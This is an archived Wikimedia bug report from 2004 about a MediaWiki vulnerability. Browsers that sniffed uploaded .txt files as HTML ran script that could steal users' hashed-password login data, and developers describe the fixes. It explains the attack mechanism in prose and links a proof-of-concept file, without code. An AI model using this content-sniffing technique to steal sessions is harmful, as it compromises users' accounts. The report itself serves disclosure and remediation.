Last modified: 2005-07-14 05:30:18 UTC

Wikimedia Bugzilla is closed!

Wikimedia migrated from Bugzilla to Phabricator. Bug reports are handled in Wikimedia Phabricator.
This static website is read-only and for historical purposes. It is not possible to log in and except for displaying bug reports and their history, links might be broken. See T2566, the corresponding Phabricator task for complete and up-to-date bug report information.
Bug 566 - serious security bug in mediawiki (Yaohua2000)
serious security bug in mediawiki (Yaohua2000)
Status: RESOLVED FIXED
Product: MediaWiki
Classification: Unclassified
General/Unknown (Other open bugs)
unspecified
All All
: High major (vote)
: ---
Assigned To: Nobody - You can work on this!
:
Depends on:
Blocks: javascript
  Show dependency treegraph
 
Reported: 2004-09-23 10:59 UTC by Jerome Jamnicky
Modified: 2005-07-14 05:30 UTC (History)
0 users

See Also:
Web browser: ---
Mobile Platform: ---
Assignee Huggle Beta Tester: ---


Attachments

Description Jerome Jamnicky 2004-09-23 10:59:55 UTC
There is some kind of problem where someone may steal the md5 hash of your 
password, apparently.  It was reported by Yaohua2000 on #mediawiki but he 
cannot use bugzilla.  He gave this URL: http://en.wikipedia.org/upload/5/59/
Tmp.txt
Comment 1 Domas Mituzas 2004-09-23 11:02:17 UTC
well, servers give out Content-type: text/plain, so that is a flaw of a browser,
if it handles non-text/html documents as html. On the other hand, all downloads
might be served from *.wikidownloads.org, so *wikipedia or *wikimedia cookies
would not apply.
Comment 2 Jamesday 2004-09-23 12:17:11 UTC
Reporter noted that "I've tested on opera,safari,ie,camino (mac os x) and ie
(win32) and mozilla,konqueror (linux) only ie (on both mac and win32) and safari
with the problem".

Users of the affected browsers should not vie wthe text file - their password
will be stolen if they do. Changing password before you view it will cause the
new one to be stolen instead, then you can change back later.
Comment 3 Brion Vibber 2004-10-10 09:25:54 UTC
Apparently no one remembered to update this bug report...

1.4cvs & 1.3.5 include stricter checks on uploads to help close the gaping holes
in IE, and we've moved the uploads on Wikipedia to an alternate domain for now
to reduce exposure to the main wikis.

1.4cvs now uses a generated token instead of the hashed hashed password for the
'remember my password' mode. This has also been backported to Wikipedia's
servers, but isn't yet included in 1.3 release as it makes some database
changes. This should be more secure against dictionary attacks to recover the
plaintext, but is still usable to login if you can snarf it.

In Windows XP SP2, IE now has a security option "Open files based on content,
not file extension". You might think that turning this off would close the
security hole, but unfortunately you'd be wrong; it still interprets ".txt" as
"it's okay to think this is HTML and run JavaScript, even though neither the
Content-Type header nor the 'extension' you think you see look like '.html' at
all". Sigh.

Note You need to log in before you can comment on or make changes to this bug.


Navigation
Links